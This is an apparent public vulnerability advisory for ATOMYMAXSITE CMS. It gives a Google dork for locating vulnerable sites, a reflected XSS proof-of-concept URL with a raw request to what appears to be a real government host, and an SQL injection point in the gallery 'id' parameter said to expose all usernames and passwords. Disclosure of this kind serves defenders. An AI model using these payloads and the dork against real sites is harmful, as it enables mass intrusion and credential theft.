facebook facebook twitter rss

ATOMYMAXSITE CMS Multiple Vulnerability

Author: Xodiak , Published: 10-05-2015
# Exploit Title: ATOMYMAXSITE CMS Multiple Vulnerability
# Google Dork: intext:"Powered By ATOMYMAXSITE" inurl:"index.php?name=gallery"
# Date: 5/05/2015
# Exploit Author: Xodiak xodiak.blackhat@gmail.com
# Vendor Homepage:N/A
# Software Link: N/A
# Version: All Version
# Tested on: Kali Linux
# CVE : N/A
#
Interductions:

ATOMYMAXSITE CMS Is Used By Government Sites And This Vulnerabilities Can Harm All Informations And Attacked By Hackers.


Cross Site Scripting (Refelected)
-========================================

An XSS Vulnerability In Search Bar And Can Used For Dangerous Ways :

Poc:

http://site.com/main/index.php?name=search&keyword=%3Cscript%3Ealert(%27Xss%27)%3C%2Fscript%3E

GET /main/index.php?name=search&keyword=%3Cscript%3Ealert(%27Xss%27)%3C%2Fscript%3E HTTP/1.1
Host: www.pck1.go.th
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: __atuvc=2%7C18; PHPSESSID=qo9g1jdmq1ptvekvh0k008of95
Connection: keep-alive
HTTP/1.1 200 OK
Date: Tue, 05 May 2015 10:35:21 GMT
Server: Apache/2.2.22 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 10728
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=tis-620


Sql Injection
=============================

In Gallery Section We Have A Sql Injection Vulnerability Can Inject All Databases

And Collect All Usernames And Passwords .

PoC:

http://www.site.com/main/index.php?name=gallery&op=gallery_detail&id=[sql]

I Hope Develepor Patch Vulnerabilities I Found 144,000 Result For Result Dork
------------------------
Tnx Very Much

Greetz :
=-| Milad Hacking, Seravo BlackHat, AC3S , Ehsan Ice , Saeed.J0ker,Alireza Attacker,MMA Defacer,END3R
Amir Avinny,Abzari,Ali.Yar.RM_MR,SHA13AH And All Of My Friends |-=

Like us on Facebook :